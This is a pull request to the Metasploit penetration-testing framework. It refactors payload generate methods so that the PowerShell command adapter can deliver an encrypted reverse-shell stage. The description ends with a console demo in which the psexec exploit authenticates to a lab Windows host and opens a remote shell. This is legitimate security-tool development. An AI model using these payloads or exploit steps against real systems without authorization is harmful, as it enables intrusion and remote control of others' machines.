### PR TITLE
Fix PowerShell Command Encrypted Shell Payloads

### DIFF
--- a/lib/msf/core/payload.rb
+++ b/lib/msf/core/payload.rb
@@ -288,7 +288,7 @@ class Payload < Msf::Module
   #
   # Generates the payload and returns the raw buffer to the caller.
   #
-  def generate
+  def generate(_opts = {})
     internal_generate
   end
 

--- a/lib/msf/core/payload.rb
+++ b/lib/msf/core/payload.rb
@@ -59,10 +59,10 @@ class Payload < Msf::Module
     #
     self.module_info['Dependencies'] = self.module_info['Dependencies'] || []
 
-    # If this is a staged payload but there is no stage information,
+    # If this is an adapted or staged payload but there is no stage information,
     # then this is actually a stager + single combination.  Set up the
     # information hash accordingly.
-    if self.class.include?(Msf::Payload::Single) and
+    if (self.class.include?(Msf::Payload::Adapter) || self.class.include?(Msf::Payload::Single)) and
       self.class.include?(Msf::Payload::Stager)
       self.module_info['Stage'] = {}
 

--- a/lib/msf/core/payload/generic.rb
+++ b/lib/msf/core/payload/generic.rb
@@ -43,7 +43,7 @@ module Payload::Generic
   # the actual payload in case settings have changed.  Other methods will
   # use the cached version if possible.
   #
-  def generate
+  def generate(_opts = {})
     reset
 
     redirect_to_actual(:generate)

--- a/lib/msf/core/payload/linux/bind_tcp.rb
+++ b/lib/msf/core/payload/linux/bind_tcp.rb
@@ -19,7 +19,7 @@ module Payload::Linux::BindTcp
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port:     datastore['LPORT'],
       reliable: false

--- a/lib/msf/core/payload/linux/reverse_tcp_x86.rb
+++ b/lib/msf/core/payload/linux/reverse_tcp_x86.rb
@@ -18,7 +18,7 @@ module Payload::Linux::ReverseTcp_x86
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port:          datastore['LPORT'],
       host:          datastore['LHOST'],

--- a/lib/msf/core/payload/linux/x64/reverse_tcp_x64.rb
+++ b/lib/msf/core/payload/linux/x64/reverse_tcp_x64.rb
@@ -17,7 +17,7 @@ module Payload::Linux::ReverseTcp_x64
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port:        datastore['LPORT'],
       host:        datastore['LHOST'],

--- a/lib/msf/core/payload/php/bind_tcp.rb
+++ b/lib/msf/core/payload/php/bind_tcp.rb
@@ -17,7 +17,7 @@ module Payload::Php::BindTcp
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port: datastore['LPORT']
     }

--- a/lib/msf/core/payload/php/reverse_tcp.rb
+++ b/lib/msf/core/payload/php/reverse_tcp.rb
@@ -17,7 +17,7 @@ module Payload::Php::ReverseTcp
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port:        datastore['LPORT'],
       host:        datastore['LHOST'],

--- a/lib/msf/core/payload/python/bind_tcp.rb
+++ b/lib/msf/core/payload/python/bind_tcp.rb
@@ -16,7 +16,7 @@ module Payload::Python::BindTcp
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port: datastore['LPORT']
     }

--- a/lib/msf/core/payload/python/reverse_tcp.rb
+++ b/lib/msf/core/payload/python/reverse_tcp.rb
@@ -21,7 +21,7 @@ module Payload::Python::ReverseTcp
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port:        datastore['LPORT'],
       host:        datastore['LHOST'],

--- a/lib/msf/core/payload/python/reverse_tcp_ssl.rb
+++ b/lib/msf/core/payload/python/reverse_tcp_ssl.rb
@@ -20,7 +20,7 @@ module Payload::Python::ReverseTcpSsl
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port:        datastore['LPORT'],
       host:        datastore['LHOST'],

--- a/lib/msf/core/payload/single.rb
+++ b/lib/msf/core/payload/single.rb
@@ -23,7 +23,7 @@ module Msf::Payload::Single
   # return the stager.  When a stager is not used, generate will return the
   # single payload
   #
-  def generate
+  def generate(_opts = {})
     # If we're staged, then we call the super to generate the STAGER
     if staged?
       super

--- a/lib/msf/core/payload/windows/bind_named_pipe.rb
+++ b/lib/msf/core/payload/windows/bind_named_pipe.rb
@@ -30,7 +30,7 @@ module Payload::Windows::BindNamedPipe
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       name:        datastore['PIPENAME'],
       host:        datastore['PIPEHOST'],

--- a/lib/msf/core/payload/windows/bind_tcp.rb
+++ b/lib/msf/core/payload/windows/bind_tcp.rb
@@ -21,7 +21,7 @@ module Payload::Windows::BindTcp
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port:     datastore['LPORT'],
       reliable: false

--- a/lib/msf/core/payload/windows/bind_tcp_rc4.rb
+++ b/lib/msf/core/payload/windows/bind_tcp_rc4.rb
@@ -17,7 +17,7 @@ module Payload::Windows::BindTcpRc4
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
     conf = {
       port:     datastore['LPORT'],

--- a/lib/msf/core/payload/windows/encrypted_reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/encrypted_reverse_tcp.rb
@@ -61,9 +61,9 @@ module Payload::Windows::EncryptedReverseTcp
 
     src = ''
     if staged?
-      src = generate_stager(conf)
+      src = generate_stager(conf, opts)
     else
-      src = generate_c_src(conf)
+      src = generate_c_src(conf, opts)
     end
 
     link_script = module_info['DefaultOptions']['LinkerScript']
@@ -92,9 +92,9 @@ module Payload::Windows::EncryptedReverseTcp
     comp_code
   end
 
-  def initial_code
+  def initial_code(conf, opts = {})
     src = headers
-    src << align_rsp if self.arch_to_s.eql?('x64')
+    src << align_rsp if opts.fetch(:arch, self.arch_to_s).eql?('x64')
 
     if staged?
       src << chacha_func_staged
@@ -104,8 +104,8 @@ module Payload::Windows::EncryptedReverseTcp
     src << exit_proc
   end
 
-  def generate_stager(conf)
-    src = initial_code
+  def generate_stager(conf, opts = {})
+    src = initial_code(conf, opts)
 
     if conf[:call_wsastartup]
       src << init_winsock
@@ -115,7 +115,7 @@ module Payload::Windows::EncryptedReverseTcp
     src << get_load_library(conf[:host], conf[:port])
     src << call_init_winsock if conf[:call_wsastartup]
     src << start_comm(conf[:uuid])
-    src << stager_comm
+    src << stager_comm(conf, opts)
   end
 
   def sends_hex_uuid?
@@ -148,21 +148,21 @@ module Payload::Windows::EncryptedReverseTcp
       keep_exe:      datastore['KeepExe'],
       show_compile_cmd: datastore['ShowCompileCMD'],
       f_name:        Tempfile.new('reverse_pic_stage').path,
-      arch:          self.arch_to_s
+      arch:          opts.fetch(:arch, self.arch_to_s)
     }
 
-    src = initial_code
+    src = initial_code(conf, opts)
     src << get_new_key
     src << init_proc
-    src << exec_payload_stage
+    src << exec_payload_stage(conf, opts)
     shellcode = get_compiled_shellcode(src, comp_opts)
 
     stage_obj = Rex::Crypto::Chacha20.new(key, iv)
     stage_obj.chacha20_crypt(shellcode)
   end
 
-  def generate_c_src(conf)
-    src = initial_code
+  def generate_c_src(conf, opts = {})
+    src = initial_code(conf, opts)
 
     if conf[:call_wsastartup]
       src << init_winsock
@@ -552,9 +552,10 @@ module Payload::Windows::EncryptedReverseTcp
     ^
   end
 
-  def stager_comm
-    reg = self.arch_to_s.eql?('x86') ? 'edi' : 'rdi'
-    inst = self.arch_to_s.eql?('x86') ? 'movl' : 'movq'
+  def stager_comm(conf, opts = {})
+    arch = opts.fetch(:arch, self.arch_to_s)
+    reg = arch.eql?('x86') ? 'edi' : 'rdi'
+    inst = arch.eql?('x86') ? 'movl' : 'movq'
 
     %Q^
         FuncRecv RecvData = (FuncRecv) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'recv')}); // hash('ws2_32.dll', 'recv') -> 0x5fc8d902
@@ -596,9 +597,10 @@ module Payload::Windows::EncryptedReverseTcp
     ^
   end
 
-  def exec_payload_stage
-    reg = self.arch_to_s.eql?('x86') ? 'edi' : 'rdi'
-    inst = self.arch_to_s.eql?('x86') ? 'movl' : 'movq'
+  def exec_payload_stage(conf, opts = {})
+    arch = opts.fetch(:arch, self.arch_to_s)
+    reg = arch.eql?('x86') ? 'edi' : 'rdi'
+    inst = arch.eql?('x86') ? 'movl' : 'movq'
 
     %Q^
      void ExecutePayload()

--- a/lib/msf/core/payload/windows/encrypted_reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/encrypted_reverse_tcp.rb
@@ -76,7 +76,7 @@ module Payload::Windows::EncryptedReverseTcp
       keep_exe:      datastore['KeepExe'],
       show_compile_cmd: datastore['ShowCompileCMD'],
       f_name:        Tempfile.new(staged? ? 'reverse_pic_stager' : 'reverse_pic_stageless').path,
-      arch:          self.arch_to_s
+      arch:          opts.fetch(:arch, self.arch_to_s)
     }
 
     comp_code = get_compiled_shellcode(src, compile_opts)

--- a/lib/msf/core/payload/windows/exec.rb
+++ b/lib/msf/core/payload/windows/exec.rb
@@ -57,7 +57,7 @@ module Payload::Windows::Exec
   #
   # Constructs the payload
   #
-  def generate
+  def generate(_opts = {})
     return super + command_string + "\x00"
   end
 

--- a/lib/msf/core/payload/windows/exec_x64.rb
+++ b/lib/msf/core/payload/windows/exec_x64.rb
@@ -53,7 +53,7 @@ module Payload::Windows::Exec_x64
       ], self.class )
   end
 
-  def generate
+  def generate(_opts = {})
     return super + command_string + "\x00"
   end
 

--- a/lib/msf/core/payload/windows/load_library.rb
+++ b/lib/msf/core/payload/windows/load_library.rb
@@ -57,7 +57,7 @@ module Payload::Windows::LoadLibrary
   #
   # Constructs the payload
   #
-  def generate
+  def generate(_opts = {})
     return super + dll_string + "\x00"
   end
 

--- a/lib/msf/core/payload/windows/reverse_named_pipe.rb
+++ b/lib/msf/core/payload/windows/reverse_named_pipe.rb
@@ -26,7 +26,7 @@ module Payload::Windows::ReverseNamedPipe
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       name:        datastore['PIPENAME'],
       host:        datastore['PIPEHOST'] || '.',

--- a/lib/msf/core/payload/windows/reverse_tcp_dns.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp_dns.rb
@@ -25,7 +25,7 @@ module Payload::Windows::ReverseTcpDns
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port:        datastore['LPORT'],
       host:        datastore['LHOST'],

--- a/lib/msf/core/payload/windows/reverse_tcp_rc4.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp_rc4.rb
@@ -17,7 +17,7 @@ module Payload::Windows::ReverseTcpRc4
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
     conf = {
       port:        datastore['LPORT'],

--- a/lib/msf/core/payload/windows/reverse_tcp_rc4_dns.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp_rc4_dns.rb
@@ -17,7 +17,7 @@ module Payload::Windows::ReverseTcpRc4Dns
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
     conf = {
       port:        datastore['LPORT'],

--- a/lib/msf/core/payload/windows/reverse_udp.rb
+++ b/lib/msf/core/payload/windows/reverse_udp.rb
@@ -16,7 +16,7 @@ module Payload::Windows::ReverseUdp
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port:        datastore['LPORT'],
       host:        datastore['LHOST'],

--- a/lib/msf/core/payload/windows/reverse_win_https.rb
+++ b/lib/msf/core/payload/windows/reverse_win_https.rb
@@ -29,7 +29,7 @@ module Payload::Windows::ReverseWinHttps
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
 
     verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
                                          datastore['HandlerSSLCert'])

--- a/lib/msf/core/payload/windows/x64/bind_named_pipe_x64.rb
+++ b/lib/msf/core/payload/windows/x64/bind_named_pipe_x64.rb
@@ -30,7 +30,7 @@ module Payload::Windows::BindNamedPipe_x64
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       name:        datastore['PIPENAME'],
       host:        datastore['PIPEHOST'],

--- a/lib/msf/core/payload/windows/x64/bind_tcp_rc4_x64.rb
+++ b/lib/msf/core/payload/windows/x64/bind_tcp_rc4_x64.rb
@@ -16,7 +16,7 @@ module Payload::Windows::BindTcpRc4_x64
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
     conf = {
       port:        datastore['LPORT'],

--- a/lib/msf/core/payload/windows/x64/bind_tcp_x64.rb
+++ b/lib/msf/core/payload/windows/x64/bind_tcp_x64.rb
@@ -19,7 +19,7 @@ module Payload::Windows::BindTcp_x64
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port:     datastore['LPORT'],
       reliable: false

--- a/lib/msf/core/payload/windows/x64/reverse_named_pipe_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_named_pipe_x64.rb
@@ -25,7 +25,7 @@ module Payload::Windows::ReverseNamedPipe_x64
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       name:        datastore['PIPENAME'],
       host:        datastore['PIPEHOST'],

--- a/lib/msf/core/payload/windows/x64/reverse_tcp_rc4_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_tcp_rc4_x64.rb
@@ -16,7 +16,7 @@ module Payload::Windows::ReverseTcpRc4_x64
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
     conf = {
       port:        datastore['LPORT'],

--- a/lib/msf/core/payload/windows/x64/reverse_tcp_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_tcp_x64.rb
@@ -26,7 +26,7 @@ module Payload::Windows::ReverseTcp_x64
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
     conf = {
       port:        datastore['LPORT'],
       host:        datastore['LHOST'],

--- a/lib/msf/core/payload/windows/x64/reverse_win_https_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_win_https_x64.rb
@@ -28,7 +28,7 @@ module Payload::Windows::ReverseWinHttps_x64
   #
   # Generate the first stage
   #
-  def generate
+  def generate(_opts = {})
 
     verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
                                          datastore['HandlerSSLCert'])

--- a/modules/payloads/adapters/cmd/windows/powershell.rb
+++ b/modules/payloads/adapters/cmd/windows/powershell.rb
@@ -34,7 +34,8 @@ module MetasploitModule
     super
   end
 
-  def generate
+  def generate(opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
     payload = super
 
     cmd_psh_payload(payload, ARCH_X86, remove_comspec: true)

--- a/modules/payloads/adapters/cmd/windows/powershell.rb
+++ b/modules/payloads/adapters/cmd/windows/powershell.rb
@@ -41,6 +41,11 @@ module MetasploitModule
     cmd_psh_payload(payload, ARCH_X86, remove_comspec: true)
   end
 
+  def generate_stage(opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
+    super
+  end
+
   def generate_payload_uuid(conf = {})
     conf[:arch] ||= module_info['AdaptedArch']
     conf[:platform] ||= module_info['AdaptedPlatform']

--- a/modules/payloads/adapters/cmd/windows/powershell.rb
+++ b/modules/payloads/adapters/cmd/windows/powershell.rb
@@ -51,4 +51,9 @@ module MetasploitModule
     conf[:platform] ||= module_info['AdaptedPlatform']
     super
   end
+
+  def handle_connection(conn, opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
+    super
+  end
 end

--- a/modules/payloads/adapters/cmd/windows/powershell/x64.rb
+++ b/modules/payloads/adapters/cmd/windows/powershell/x64.rb
@@ -34,7 +34,8 @@ module MetasploitModule
     super
   end
 
-  def generate
+  def generate(opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
     payload = super
 
     cmd_psh_payload(payload, ARCH_X64, remove_comspec: true)

--- a/modules/payloads/adapters/cmd/windows/powershell/x64.rb
+++ b/modules/payloads/adapters/cmd/windows/powershell/x64.rb
@@ -51,4 +51,9 @@ module MetasploitModule
     conf[:platform] ||= module_info['AdaptedPlatform']
     super
   end
+
+  def handle_connection(conn, opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
+    super
+  end
 end

--- a/modules/payloads/adapters/cmd/windows/powershell/x64.rb
+++ b/modules/payloads/adapters/cmd/windows/powershell/x64.rb
@@ -41,6 +41,11 @@ module MetasploitModule
     cmd_psh_payload(payload, ARCH_X64, remove_comspec: true)
   end
 
+  def generate_stage(opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
+    super
+  end
+
   def generate_payload_uuid(conf = {})
     conf[:arch] ||= module_info['AdaptedArch']
     conf[:platform] ||= module_info['AdaptedPlatform']


### PR DESCRIPTION
This fixes an issue that prevented the encrypted_shell stage from being used by the Powershell command adapter. The root cause was that it was checking it's own architecture, which when reported as ARCH_CMD would cause the compilation to fail. These proposed changes ensure that the architecture to generate code for is able to be explicitly overridden by the caller, which the adapter does to specify the adapted architecture. This also updates the signature of quite a few `generate` methods to take an opts hash because adding it just for the encrypted shells, caused other payloads to break. This convention is already widely used in `Msf::Payloads` with only a couple of exceptions.

Generate signature variations:
* https://github.com/rapid7/metasploit-framework/blob/a2dc366eb4097a42f6fa5893c289ab504255f25f/lib/msf/core/payload/solaris.rb#L65
   * this just forwards the args splat to super 
* https://github.com/rapid7/metasploit-framework/blob/a2dc366eb4097a42f6fa5893c289ab504255f25f/lib/msf/core/payload/aix.rb#L32
    * this does not do anything with them

`lib/msf/core/payload.rb` also needed to be updated to properly set the `@staged` instance variable for adapters that were wrapping staged payloads like `cmd/windows/powershell/x64/encrypted_shell/reverse_tcp`.

Fixes #16587

## Verification

- [x] For the `windows/x64/encrypted_shell/reverse_tcp` payload
    - [x] The direct payload can be used, generated and a handler started with `to_handler`
    - [x] The payload can be used in the psexec exploit (use the PowerShell target)
- [x] For the `cmd/windows/powershell/encrypted_shell/reverse_tcp` payload
    - [x] The direct payload can be used, generated and a handler started with `to_handler`
    - [x] The payload can be used in the psexec exploit (use the Command target)

## Demo

```
msf6 exploit(windows/smb/psexec) > show options 

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.159.96   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               Password1!       no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBUser               smcintyre        no        The username to authenticate as


Payload options (cmd/windows/powershell/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.250.134  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   4   Command


msf6 exploit(windows/smb/psexec) > set PAYLOAD cmd/windows/powershell/x64/encrypted_shell/reverse_tcp 
PAYLOAD => cmd/windows/powershell/x64/encrypted_shell/reverse_tcp
msf6 exploit(windows/smb/psexec) > exploit

[*] Payload does not exist in database. Attempting to save it now.
[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] 192.168.159.96:445 - Connecting to the server...
[*] 192.168.159.96:445 - Authenticating to 192.168.159.96:445 as user 'smcintyre'...
[+] 192.168.159.96:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (3584 bytes) to 192.168.250.237
[-] 192.168.159.96:445 - Unable to get handle: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION
[-] 192.168.159.96:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 192.168.159.96:445 - Getting the command output...
[-] 192.168.159.96:445 - Unable to read file \Windows\Temp\NhOkNQPvVrrYP.txt. RubySMB::Error::UnexpectedStatusCode: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION.
[-] 192.168.159.96:445 - Error getting command output
[*] 192.168.159.96:445 - Executing cleanup...
[+] 192.168.159.96:445 - Cleanup was successful
[*] Encrypted reverse shell session 2 opened (192.168.250.134:4444 -> 192.168.250.237:62213) at 2022-05-19 16:26:16 -0400


C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet (Kernel Debugger):

   Connection-specific DNS Suffix  . : localdomain
   Link-local IPv6 Address . . . . . : fe80::b4dd:730c:d9b8:57b5%3
   IPv4 Address. . . . . . . . . . . : 192.168.159.96
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.159.2

C:\Windows\system32>
```